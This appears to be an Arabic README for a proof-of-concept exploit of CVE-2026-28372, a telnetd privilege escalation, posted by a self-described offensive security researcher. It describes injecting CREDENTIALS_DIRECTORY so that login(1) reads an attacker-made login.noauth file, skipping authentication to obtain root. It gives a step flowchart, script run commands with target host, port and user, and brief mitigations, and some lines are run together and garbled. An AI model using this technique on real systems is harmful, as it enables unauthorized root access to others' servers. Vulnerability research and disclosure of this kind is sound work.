
إثبات مفهوم لاستغلال CVE-2026-28372، يوضح تصعيد الامتيازات المحلية في GNU inetutils telnetd عبر CREDENTIALS_DIRECTORY وlogin.noauth لتجاوز المصادقة والحصول على قشرة صلاحيات الجذر.
محمد إدريس بن يامر
الأردن 🇯🇴
Instagram: @banyamer_security
باحث أمني | أمن هجومي | تطوير استغلالات
CVE‑2026‑28372 — تصعيد الامتيازات في GNU inetutils telnetd عبر CREDENTIALS_DIRECTORY + login.noauth
يوضح هذا الدليل البرهاني (Proof‑of‑Concept) ثغرة تصعيد امتيازات محلي في GNU inetutils telnetd.
يقوم telnetd بتمرير متغيرات البيئة التي يتحكم بها العميل إلى login(1) بشكل غير صحيح.
من خلال تعيين:
CREDENTIALS_DIRECTORY=<دليل المهاجم>
ووضع:
login.noauth = yes
يتم تجاوز المصادقة، مما قد يمنح جذر (root) بدون كلمة مرور.
login.noauthمشكلة الثقة في متغيرات البيئة بين telnetd → login(1).
login.noauth بقيمة yeslogin دليل بيانات الاعتماد الذي يتحكم به المهاجمflowchart TD
A[مستخدم غير مميز] --> B[إنشاء دليل بيانات اعتماد مزيف]
B --> C[وضع login.noauth = yes]
C --> D[الاتصال بـ telnetd]
D --> E[حقن متغيرات البيئة]
E --> F[تعيين CREDENTIALS_DIRECTORY]
F --> G[telnetd يستدعي login]
G --> H[login يقرأ login.noauth]
H --> I[تجاوز المصادقة]
I --> J[الحصول على جذر]
python3 cve-2026-28372.py
معاملات اختيارية:
python3 cve-2026-28372.py --host 127.0.0.1 --port 23 --user root
✔ إنشاء دليل بيانات اعتماد يتحكم به المهاجم
✔ توليد ملف تجاوز login.noauth
✔ الاتصال بـ telnetd
✔ حقن متغيرات بيئة خبيثة
✔ محاولة تجاوز المصادقة
unsetenv("CREDENTIALS_DIRECTORY")
/bin/login أو /usr/bin/loginيُقدَّم هذا الدليل البرهاني للأغراض التالية:
الاستخدام غير المصرح به محظور.
الدليل البرهاني من بحث:
محمد إدريس بن يامر banyamer_security